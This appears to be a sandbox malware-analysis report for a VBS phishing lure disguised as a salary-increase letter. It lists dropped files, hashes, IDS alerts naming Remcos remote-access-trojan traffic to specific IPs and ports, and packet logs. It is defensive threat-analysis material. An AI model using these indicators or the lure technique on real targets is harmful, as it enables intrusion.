                                                                                      Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):8003
                                                                                      Entropy (8bit):4.840877972214509
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                                      MD5:106D01F562D751E62B702803895E93E0
                                                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                                      Malicious:false
                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1940658735648508
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Qn:Qn
                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x8672f832, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):17301504
                                                                                      Entropy (8bit):1.0235392314843244
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:TvQPYV7AyUO+xBGA611GJxBGA611Gv0M6JKX3XX35X3khTAvhTA/hTATX3t8nqks:4yUt3F0TkT0TAitKxK9JdIC4Ago
                                                                                      MD5:8957A75E3359D8DA8E0ED421AEB5B2AC
                                                                                      SHA1:5F42CA129705322D0B3A887D36DCFC5B4AF7831E
                                                                                      SHA-256:A63EDC5508463DF9741BC954C5CD352E3DEDFA7C200AFE212EC86A6BB4251FD5
                                                                                      SHA-512:044F3F1F3F2CFD4F98EF4C2242017F88CF178BCC72BBAADD9A16A431B80802B92F5C9999F67175F1D822617C4297C007FDF3BC3383DBBE03D0DA5D8688422558
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):462228
                                                                                      Entropy (8bit):5.968472624967764
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:2T4KZp2u66MllPhOQQZC9ij0pDcH+RV1yMCRtw2:gAXllEC/W+RVw82
                                                                                      MD5:D416B489676A7A0E99127A093381013C
                                                                                      SHA1:789C52ECDB35E346A91690E0B4ECE4171377F864
                                                                                      SHA-256:AA4BF18FAAB69470759A7048C14E5EAA8329087E4035D84DDCC97BBB9C1EE6B1
                                                                                      SHA-512:FEF21B0BB558390479D908B6295D85BDFD878E6D24E5F85935159B8A20DEBA0B35CD36A46416F93E8CDC9BB78D1E0091E65D8C2B135D91A80B72892805EB0F4C
                                                                                      Malicious:false
                                                                                      File type:ASCII text, with very long lines (2232), with CRLF line terminators
                                                                                      Entropy (8bit):5.407807225046289
                                                                                      TrID:
                                                                                      • Visual Basic Script (13500/0) 100.00%
                                                                                      File name:Salary Increase Letter_Oct 2024.vbs
                                                                                      File size:19'379 bytes
                                                                                      MD5:35c0401fa3a0988df57e978eaa661dd2
                                                                                      SHA1:a07a742be842b55f4218d8c9f6f2287c21baf2db
                                                                                      SHA256:165cb6e17955b9dbc743f800788545b61e296119b10d22efea0cfb2f1ceb4ed5
                                                                                      SHA512:3aaf8a7bdf2da627c05065cc4e999015adc968f111da32fb0e6c2fe80e73553b3f125964796790f8257cd0dfc6468cd939b18e47fb8b3f468bd2625579246371
                                                                                      SSDEEP:384:245uPIaVI9kYnUqIsLcZ/j5SL5u9InBOqJckjVMQZKWZrqLwA0:WPIaVI95U57Z9SgqBOxkRhrb
                                                                                      TLSH:649239ECCF4722D89B66BEA4480D3CA04A7C554BD530287179E443DD2286C6C93FDE9D
                                                                                      File Content Preview:....Miradorsfortstopfolke = FreeFile......Simulacraauletaid = Right("Lagenian",38)....Kreditomkostningerne = 58297..Neuron = 5251..Distill = "Phallis fabriksassistenters"..Manoeuvrable = 44367..Konceptionernes = &HFFFF9091..Filurerne = -58076..Drilleriet
                                                                                      Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-10T09:27:56.635535+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49893 | 104.21.2.6 | 80 | TCP
2024-10-10T09:28:00.605083+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49915 | 154.216.17.14 | 2404 | TCP
2024-10-10T09:28:01.781683+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.6 | 49927 | 178.237.33.50 | 80 | TCP
2024-10-10T09:28:01.917571+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 49926 | 154.216.17.14 | 2404 | TCP
                                                                                      Oct 10, 2024 09:27:24.189120054 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.189137936 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.189153910 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.189194918 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.189202070 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.189227104 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.189280033 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194224119 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194263935 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194281101 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194319010 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194336891 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194360018 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194375038 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194379091 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194403887 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194421053 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194431067 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194437027 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194453955 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194463015 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194468975 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194484949 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194513083 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194535971 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194536924 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194552898 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194567919 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194582939 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194595098 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194597006 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194612980 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194626093 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194628000 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194644928 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.194657087 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194691896 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.194947958 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.195169926 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.195214033 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.230576038 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.230635881 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.230668068 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.230691910 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273497105 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273526907 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273544073 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273556948 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273560047 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273586035 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273595095 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273602962 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273619890 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273627043 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273634911 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273652077 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273662090 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273667097 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273684978 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273694992 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273699999 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273722887 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273761988 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273802996 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273808956 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273825884 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273861885 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273878098 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273885012 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273895025 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273910999 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273920059 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.273926020 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.273950100 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274100065 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274125099 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274142027 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274157047 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274158955 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274173021 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274199009 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274203062 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274215937 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274223089 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274231911 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274249077 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274259090 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274287939 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274322987 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274416924 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274434090 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274457932 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274463892 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274472952 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274490118 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274507046 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274512053 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274547100 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274550915 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274563074 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274593115 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274647951 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274682999 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274688959 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274699926 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274739027 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274775982 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274791956 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274807930 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274823904 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274831057 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274866104 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274909973 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274924994 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274940014 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274955034 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274965048 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.274971962 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274988890 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.274992943 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275003910 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275019884 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275026083 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275038004 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275065899 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275233030 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275274038 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275279999 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275300980 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275316954 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275338888 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275343895 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275356054 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275372982 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275382042 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275412083 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275487900 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275502920 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275517941 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275532007 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275544882 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275546074 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275563002 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275574923 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275578022 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275594950 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275600910 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275624037 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275639057 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275652885 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275654078 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275671005 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275680065 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275686026 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275701046 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275716066 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.275717020 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.275733948 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276037931 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276082039 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276084900 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276097059 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276124001 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276139021 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276139975 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276180029 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276213884 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276230097 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276243925 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276259899 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276268005 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276277065 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276302099 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276372910 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276387930 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276402950 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276412010 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276417971 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276436090 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276443958 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276457071 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276473999 CEST4971280192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:24.276474953 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:24.276490927 CEST8049712104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.653146982 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.653882027 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.653894901 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.653904915 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.653961897 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.653961897 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.654644012 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.654654980 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.654665947 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.654705048 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.654755116 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.655412912 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.655424118 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.655433893 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.655494928 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.655494928 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.656151056 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.656162977 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.656172991 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.656239033 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.657660961 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.657721996 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.657779932 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.657798052 CEST8049893104.21.2.6192.168.2.6
                                                                                      Oct 10, 2024 09:27:56.657892942 CEST4989380192.168.2.6104.21.2.6
                                                                                      Oct 10, 2024 09:27:56.657892942 CEST4989380192.168.2.6104.21.2.6
